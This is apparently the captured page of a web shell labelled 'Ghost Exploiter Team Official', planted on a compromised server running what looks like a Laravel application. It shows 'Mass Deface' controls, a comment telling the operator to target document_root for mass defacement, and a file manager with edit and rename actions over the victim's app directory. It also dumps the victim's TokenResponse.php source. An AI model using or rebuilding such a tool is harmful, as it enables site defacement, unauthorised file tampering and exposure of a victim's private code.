Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Repositories
/
Model
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Interfaces
--
ren
CqrsServiceProvider.php
1.188KB
edt
ren
Dto.php
6.402KB
edt
ren
ModelRepository-2026012
...
1.382KB
edt
ren
ModelRepository.php
1.382KB
edt
ren
PaginationDto.php
0KB
edt
ren
Permission.php
0.239KB
edt
ren
ResponseDto.php
1.147KB
edt
ren
TokenResponse.php
1.604KB
edt
ren
accounts.php
0.905KB
edt
ren
app.php
4.229KB
edt
ren
auth.php
3.935KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; use App\BaseClasses\BaseResponse; use Illuminate\Http\{JsonResponse}; class TokenResponse extends BaseResponse { private int $status; private string $message; private string $token; private int $userId; public function __construct( int $status, string $message, string $token, int $userId ) { $this->status = $status; $this->message = $message; $this->token = $token; $this->userId = $userId; } public function toResponse($request): JsonResponse { return new JsonResponse( data: [ 'status' => $this->status, 'data' => [ 'message' => __(key: $this->message), 'token' => __(key: $this->token), 'userId' => __(key: $this->userId), ], 'metadata' => [ 'request_id' => str()->uuid()->toString(), 'timestamp' => now()->toIso8601String() ], ], status: $this->status ); } public static function example(): array { return [ 'data' => [ 'message' => 'Token generated successfully', 'token' => 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpvaG4iOiIxMjM0NTQ4ODM3ODA2IiwidmFsdWUifQ...', 'userId' => 123, ], 'metadata' => [ 'request_id' => str()->uuid()->toString(), 'timestamp' => now()->toIso8601String() ] ]; } }